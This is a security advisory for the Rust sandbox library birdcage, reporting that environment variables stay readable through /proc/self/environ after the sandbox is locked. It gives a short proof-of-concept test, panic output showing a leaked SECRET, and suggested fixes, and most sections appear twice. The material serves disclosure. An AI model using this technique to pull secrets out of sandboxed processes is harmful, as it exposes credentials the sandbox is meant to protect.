Headline
GHSA-wj7f-468m-6mv8: Environment variables still accessible through /proc
Impact
Environment variables can be read from procfs unless a new process is started.
PoC
use birdcage::{Birdcage, Sandbox};
use std::{env, fs};
fn main() {
Birdcage::new().lock().unwrap();
assert_eq!(env::var_os("SECRET"), None);
let environ = fs::read_to_string("/proc/self/environ").unwrap();
assert!(!environ.contains("SECRET"), "ENVIRON CONTAINS SECRET:\n{environ}");
}
$ SECRET=test cargo run
thread 'main' panicked at src/main.rs:10:5:
ENVIRON CONTAINS SECRET:
[truncated]
Possible Solutions
The simplest solution would be relying on the ptrace isolation and always spawning a new process by changing birdcage’s API to create a new command. With an additional PID namespace the guarantees could be even further reinforced.
Impact
Environment variables can be read from procfs unless a new process is started.
PoC
use birdcage::{Birdcage, Sandbox};
use std::{env, fs};
fn main() {
Birdcage::new().lock().unwrap();
assert_eq!(env::var_os("SECRET"), None);
let environ = fs::read_to_string("/proc/self/environ").unwrap();
assert!(!environ.contains("SECRET"), "ENVIRON CONTAINS SECRET:\n{environ}");
}
$ SECRET=test cargo run
thread 'main' panicked at src/main.rs:10:5:
ENVIRON CONTAINS SECRET:
[truncated]
Possible Solutions
The simplest solution would be relying on the ptrace isolation and always spawning a new process by changing birdcage’s API to create a new command. With an additional PID namespace the guarantees could be even further reinforced.
References
- GHSA-wj7f-468m-6mv8